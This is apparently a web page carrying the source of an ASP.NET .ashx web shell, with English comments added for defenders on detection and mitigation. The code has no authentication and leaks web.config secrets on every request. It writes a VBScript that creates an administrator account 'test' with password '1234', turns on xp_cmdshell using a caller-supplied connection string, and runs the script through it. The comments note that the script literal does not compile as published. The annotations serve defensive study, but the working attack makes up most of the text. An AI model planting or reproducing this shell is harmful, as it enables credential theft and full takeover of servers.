• ashx入侵


    <%@ WebHandler Language="C#" Class="TextLd" %>
    using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Web;
    using System.Data.SqlClient;

    // Sample of a malicious ASP.NET generic handler (.ashx web shell), annotated for
    // defenders. Nothing in this class checks who is calling it: any client that can
    // reach the URL drives it through the "method" and "connection" query-string values.
    // What to look for: an unexpected .ashx file in the application directory, IIS log
    // entries for an .ashx request carrying those two parameters, and a new 1.vbs file
    // in the site root.
    public class TextLd : IHttpHandler
    {
    // Starts d:1.vbs with Process.Start and writes script text to that same path.
    // The newPath parameter is never read, and ProcessRequest below does not call
    // this method.
    // NOTE(review): the script literal is kept exactly as published; its inner double
    // quotes are not escaped, so the listing is not valid C# as shown.
    // The script text names the local Administrators group and a user called "test".
    // Detection: a script host started as a child of the web application's process.
    public void CreateLocalUser(string newPath)
    {
    System.Diagnostics.Process.Start(@"d:1.vbs");
    System.IO.File.WriteAllText(@"d:1.vbs", "set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") '属性,admin组 od=ob.Create("user","test") '建立用户 SetPassword "1234" '设置密码 SetInfo of=GetObject(os&"/test",user) add os&"/test"");
    }
    // Writes the complete text of the application's web.config into the HTTP response.
    // Risk: web.config typically holds connection strings and keys, so this discloses
    // them to the caller. Mitigation: keep secrets out of web.config or encrypt the
    // relevant configuration sections, and rotate any credential that may have been read.
    public void ShowWebConfig(HttpContext context)
    {
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
    }
    // Writes a file named 1.vbs into the application root (the path comes from MapPath).
    // The script text is the same as in CreateLocalUser: it names the local
    // Administrators group, a user "test" and the password "1234".
    // Detection: file-integrity monitoring on the web root for new script files;
    // Windows Security events 4720 (account created) and 4732 (member added to a
    // local group) if such a script is ever run.
    // Mitigation: the application pool identity should not have write access to the
    // site directory.
    public void WriteVbs(HttpContext context)
    {
    System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"), "set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") '属性,admin组 od=ob.Create("user","test") '建立用户 SetPassword "1234" '设置密码 SetInfo of=GetObject(os&"/test",user) add os&"/test"");
    }
    // Opens a SqlConnection with the given connection string and runs the given SQL
    // text through ExecuteNonQuery; no result is returned to the caller.
    // In ProcessRequest the connection string is taken directly from the query string,
    // so the request decides which server and login are used.
    public void ExecuteSql(string connection, string sql)
    {
    using (SqlConnection con = new SqlConnection(connection))
    {
    using (SqlCommand commd = new SqlCommand(sql, con))
    {
    con.Open();
    commd.ExecuteNonQuery();
    con.Close();
    }
    }
    }
    // Entry point for every request to the handler. It sets the content type to
    // text/plain and writes web.config into the response before looking at any
    // parameter, then dispatches on the "method" query-string value.
    // Exception messages are written back to the client as well.
    public void ProcessRequest(HttpContext context)
    {
    context.Response.ContentType = "text/plain";
    // Unconditional: every response starts with the contents of web.config.
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
    try
    {
    // Caller-supplied connection string, passed unchanged to ExecuteSql.
    var connection = context.Request.QueryString["connection"];
    switch (context.Request.QueryString["method"])
    {
    case "1": WriteVbs(context); break;
    case "2":
    // Changes server-wide SQL Server configuration. This only succeeds for a login
    // allowed to alter server settings, so the web application's SQL login should
    // never be a sysadmin. Detection: sp_configure changes are recorded in the
    // SQL Server error log.
    ExecuteSql(connection,@"sp_configure 'show advanced options',1 reconfigure");
    ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");//enable xp_cmdshell on the database server
    break;
    // Runs cscript on the 1.vbs file in the site root through xp_cmdshell.
    // Detection: the SQL Server service process starting cmd.exe or cscript.exe.
    // Mitigation: keep xp_cmdshell disabled and audit any change to that option.
    case "3": ExecuteSql(connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'");
    break;
    default:
    // No recognised "method" value: web.config is written to the response a second time.
    ShowWebConfig(context);
    break;
    }
    }
    catch (Exception ex)
    {
    // The raw exception message goes to the client.
    context.Response.Write(ex.Message);
    }
    context.Response.End();
    }
    // Always false: the handler instance is not offered for reuse across requests.
    public bool IsReusable
    {
    get
    {
    return false;
    }
    }
    }

  • 原文地址:https://www.cnblogs.com/a14907/p/5053530.html